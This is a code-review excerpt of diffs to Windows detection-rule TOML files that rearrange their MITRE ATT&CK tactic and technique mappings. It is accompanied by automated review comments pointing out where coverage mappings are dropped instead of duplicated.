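Review bot: The second `[[rule.threat]]` entry is rewritten from Defense Evasion with `T1036` / `T1036.003` ("Rename Legitimate Utilities") into Privilege Escalation with `T1546.008`, so the Masquerading mapping disappears from this rule entirely. Adding `T1546.008` under Privilege Escalation is valid, but the query in the hunk header is a process-start rule and is not visibly changed, so if it still matches renamed or replaced accessibility binaries the Defense Evasion entry should be kept as a third `[[rule.threat]]` entry rather than overwritten. If the Masquerading mapping was judged inaccurate, say so in the commit description so the coverage change is traceable.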
@@ -154,23 +154,48 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.015" name = "Component Object Model Hijacking" reference = "https://attack.mitre.org/techniques/T1546/015/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique.subtechnique]] +id = "T1546.015" +name = "Component Object Model Hijacking" +reference = "https://attack.mitre.org/techniques/T1546/015/" + + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/persistence_suspicious_scheduled_task_runtime.toml b/rules/windows/persistence_suspicious_scheduled_task_runtime.toml index 9a17c463d7f..ed301eb30bb 100644 --- a/rules/windows/persistence_suspicious_scheduled_task_runtime.toml +++ b/rules/windows/persistence_suspicious_scheduled_task_runtime.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/12/11" [rule] author = ["Elastic"] 
@@ -122,81 +122,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1127" -name = "Trusted Developer Utilities Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1127/" - -[[rule.threat.technique.subtechnique]] -id = "T1127.001" -name = "MSBuild" -reference = "https://attack.mitre.org/techniques/T1127/001/" - -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.002" -name = "Control Panel" -reference = "https://attack.mitre.org/techniques/T1218/002/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.004" -name = "InstallUtil" -reference = "https://attack.mitre.org/techniques/T1218/004/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.005" -name = "Mshta" -reference = "https://attack.mitre.org/techniques/T1218/005/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.007" -name = "Msiexec" -reference = "https://attack.mitre.org/techniques/T1218/007/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.009" -name = "Regsvcs/Regasm" -reference = "https://attack.mitre.org/techniques/T1218/009/" - +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" [[rule.threat.technique.subtechnique]] -id = "T1218.010" -name = "Regsvr32" -reference = "https://attack.mitre.org/techniques/T1218/010/" +id = "T1053.005" +name = "Scheduled Task" 
+reference = "https://attack.mitre.org/techniques/T1053/005/" -[[rule.threat.technique.subtechnique]] -id = "T1218.011" -name = "Rundll32" -reference = "https://attack.mitre.org/techniques/T1218/011/" -[[rule.threat.technique]] -id = "T1220" -name = "XSL Script Processing" -reference = "https://attack.mitre.org/techniques/T1220/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/persistence_temp_scheduled_task.toml b/rules/windows/persistence_temp_scheduled_task.toml index 9ec575d97b2..fbc8a28fda9 100644 --- a/rules/windows/persistence_temp_scheduled_task.toml +++ b/rules/windows/persistence_temp_scheduled_task.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/29" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -74,18 +74,36 @@ sequence by winlog.computer_name, winlog.event_data.TaskName with maxspan=5m [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" +[[rule.threat.technique.subtechnique]] +id = "T1053.005" +name = "Scheduled Task" +reference = "https://attack.mitre.org/techniques/T1053/005/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + 
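Review bot: The entire Defense Evasion entry — `T1127`/`T1127.001`, `T1218` with its `.002`, `.004`, `.005`, `.007`, `.009`, `.010`, `.011` sub-techniques, and `T1220` — is removed and replaced by a second `T1053`/`T1053.005` entry under Execution, so the rule no longer reports any proxy-execution coverage. Listing `T1053` under Execution as well as Persistence is fine, but the query shown in the hunk header is not touched by this patch, so if it still keys on those proxy-execution binaries being launched from scheduled tasks the Defense Evasion entry should remain as an additional `[[rule.threat]]` entry. This hunk spans two physical lines of the diff; the removed technique list is on the preceding line.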
diff --git a/rules/windows/persistence_time_provider_mod.toml b/rules/windows/persistence_time_provider_mod.toml index d4d2d46de13..7b99257a7d9 100644 --- a/rules/windows/persistence_time_provider_mod.toml +++ b/rules/windows/persistence_time_provider_mod.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/19" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/08/26" [transform] [[transform.osquery]] @@ -137,23 +137,36 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.003" name = "Time Providers" reference = "https://attack.mitre.org/techniques/T1547/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" +[[rule.threat.technique.subtechnique]] +id = "T1547.003" +name = "Time Providers" +reference = "https://attack.mitre.org/techniques/T1547/003/" + + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/persistence_via_application_shimming.toml b/rules/windows/persistence_via_application_shimming.toml index 78c51316c02..1fb717e1aa7 100644 --- a/rules/windows/persistence_via_application_shimming.toml +++ b/rules/windows/persistence_via_application_shimming.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/12/01" [rule] author = ["Elastic"] @@ -101,18 +101,36 @@ process where host.os.type == "windows" and event.type == "start" and process.na [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.011" name = "Application Shimming" reference = "https://attack.mitre.org/techniques/T1546/011/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique.subtechnique]] +id = "T1546.011" +name = "Application Shimming" +reference = "https://attack.mitre.org/techniques/T1546/011/" + + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml b/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml index cd8b93affc2..5ce887dd079 100644 --- a/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml +++ b/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/17" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
@@ -96,23 +96,46 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" +[[rule.threat.technique.subtechnique]] +id = "T1053.005" +name = "Scheduled Task" +reference = "https://attack.mitre.org/techniques/T1053/005/" + + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/privilege_escalation_lsa_auth_package.toml b/rules/windows/privilege_escalation_lsa_auth_package.toml index c66cc222bb1..24dcc87b0fe 100644 --- a/rules/windows/privilege_escalation_lsa_auth_package.toml +++ b/rules/windows/privilege_escalation_lsa_auth_package.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/21" integration = ["endpoint", "m365_defender"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/01/15" [rule] author = ["Elastic"] 
@@ -79,18 +79,36 @@ The Local Security Authority (LSA) in Windows manages authentication and securit [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.002" name = "Authentication Package" reference = "https://attack.mitre.org/techniques/T1547/002/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" +[[rule.threat.technique.subtechnique]] +id = "T1547.002" +name = "Authentication Package" +reference = "https://attack.mitre.org/techniques/T1547/002/" + + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/privilege_escalation_persistence_phantom_dll.toml b/rules/windows/privilege_escalation_persistence_phantom_dll.toml index ac568a9852b..4cc497eaafe 100644 --- a/rules/windows/privilege_escalation_persistence_phantom_dll.toml +++ b/rules/windows/privilege_escalation_persistence_phantom_dll.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/07" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2026/01/02" [rule] author = ["Elastic"] 
@@ -151,36 +151,53 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" - [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" - [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" reference = "https://attack.mitre.org/techniques/T1036/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.001" +name = "DLL" +reference = "https://attack.mitre.org/techniques/T1574/001/" + + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml b/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml index b81fb1bf61d..e4d788cb975 100644 --- a/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml +++ b/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/21" integration = ["endpoint", "m365_defender"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2026/02/25" [rule] author = ["Elastic"] 
@@ -83,12 +83,10 @@ Port monitors and print processors are integral to Windows printing, managing da [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.010" name = "Port Monitors" @@ -99,7 +97,31 @@ id = "T1547.012" name = "Print Processors" reference = "https://attack.mitre.org/techniques/T1547/012/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" +[[rule.threat.technique.subtechnique]] +id = "T1547.010" +name = "Port Monitors" +reference = "https://attack.mitre.org/techniques/T1547/010/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.012" +name = "Print Processors" +reference = "https://attack.mitre.org/techniques/T1547/012/" + + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml b/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml index 5dd2e273789..4f92ccdc7c3 100644 --- a/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml +++ b/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/28" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
@@ -88,36 +88,53 @@ process where host.os.type == "windows" and event.type == "start" and process.na [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" +[[rule.threat.technique.subtechnique]] +id = "T1548.002" +name = "Bypass User Account Control" +reference = "https://attack.mitre.org/techniques/T1548/002/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1559" name = "Inter-Process Communication" reference = "https://attack.mitre.org/techniques/T1559/" - [[rule.threat.technique.subtechnique]] id = "T1559.001" name = "Component Object Model" reference = "https://attack.mitre.org/techniques/T1559/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml b/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml index 0a42a979410..cc5a3e44aa3 100644 --- a/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml +++ b/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/10/19" integration = ["endpoint", "windows", "m365_defender"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -85,36 +85,53 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" +[[rule.threat.technique.subtechnique]] +id = "T1548.002" +name = "Bypass User Account Control" +reference = "https://attack.mitre.org/techniques/T1548/002/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1559" name = "Inter-Process Communication" reference = "https://attack.mitre.org/techniques/T1559/" - [[rule.threat.technique.subtechnique]] id = "T1559.001" name = "Component Object Model" reference = "https://attack.mitre.org/techniques/T1559/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml b/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml index 47b9cbe8d77..8763bfd5251 100644 --- a/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml 
+++ b/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/08/28" [rule] author = ["Elastic"] @@ -101,41 +101,53 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" +[[rule.threat.technique.subtechnique]] +id = "T1548.002" +name = "Bypass User Account Control" +reference = "https://attack.mitre.org/techniques/T1548/002/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + 
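Review bot: The diskcleanup hunk drops `T1574` (Hijack Execution Flow) from the Privilege Escalation entry and does not carry it into the new Defense Evasion entry, so a rule named for a hijack no longer maps to the hijack technique; related drops are `T1574.011` in the Persistence entries on L4635 and L4636, and on L4629 `T1574.001` moves from TA0004 to TA0005 instead of appearing under both. ATT&CK lists T1574 under Persistence, Privilege Escalation and Defense Evasion, so the per-tactic split this series introduces would normally repeat the technique in each relevant entry rather than remove it. If the removals are deliberate re-scoping, the commit message should say so; otherwise restore the `[[rule.threat.technique]]` table for `T1574` (and `T1574.011` on L4635/L4636) in the entries that lost it.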
diff --git a/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml b/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml index 0589211912e..db0e8042ad4 100644 --- a/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml +++ b/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/27" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/09/01" [rule] author = ["Elastic"] @@ -92,28 +92,46 @@ file where host.os.type == "windows" and event.type : "change" and process.name [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" +[[rule.threat.technique.subtechnique]] +id = "T1548.002" +name = "Bypass User Account Control" +reference = "https://attack.mitre.org/techniques/T1548/002/" + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" - [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" + + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + 
diff --git a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml b/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml index 3834bf21c19..c9cd1c4a1bb 100644 --- a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml +++ b/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/17" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/09/11" [transform] [[transform.osquery]] @@ -144,18 +144,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" +[[rule.threat.technique.subtechnique]] +id = "T1548.002" +name = "Bypass User Account Control" +reference = "https://attack.mitre.org/techniques/T1548/002/" + + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml b/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml index 41942914eca..5205c3c67f0 100644 --- a/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml +++ b/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/10/13" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -110,36 +110,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" - [[rule.threat.technique.subtechnique]] id = "T1055.012" name = "Process Hollowing" reference = "https://attack.mitre.org/techniques/T1055/012/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1569" -name = "System Services" -reference = "https://attack.mitre.org/techniques/T1569/" - +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" [[rule.threat.technique.subtechnique]] -id = "T1569.002" -name = "Service Execution" -reference = "https://attack.mitre.org/techniques/T1569/002/" +id = "T1055.012" +name = "Process Hollowing" +reference = "https://attack.mitre.org/techniques/T1055/012/" + + [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules_building_block/command_and_control_bitsadmin_activity.toml b/rules_building_block/command_and_control_bitsadmin_activity.toml index d4e57b19af3..3952b06069b 100644 --- a/rules_building_block/command_and_control_bitsadmin_activity.toml +++ b/rules_building_block/command_and_control_bitsadmin_activity.toml 
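Review bot: The svchost hunk removes the Execution entry (`T1569.002` Service Execution under `TA0002`) outright and replaces it with a Defense Evasion copy of `T1055.012`, so the rule loses its only Execution mapping; the bitsadmin hunk on L4632 (drops the `T1059.001` / TA0002 entry for a `T1197` Persistence entry) and the msoffice hunk on L4633 (deletes the `T1203` + `T1204.002` Execution entry) do the same. Re-homing a technique under an additional tactic is what the rest of the series does, but these three replace rather than add, and the commit title does not mention narrowing coverage. If the narrowing is intended, state it in the commit message; otherwise keep the removed `[[rule.threat]]` entries and append the new tactic entries alongside them.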
@@ -2,7 +2,7 @@ creation_date = "2023/08/21" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -57,44 +57,38 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1197" name = "BITS Jobs" reference = "https://attack.mitre.org/techniques/T1197/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1197" +name = "BITS Jobs" +reference = "https://attack.mitre.org/techniques/T1197/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git 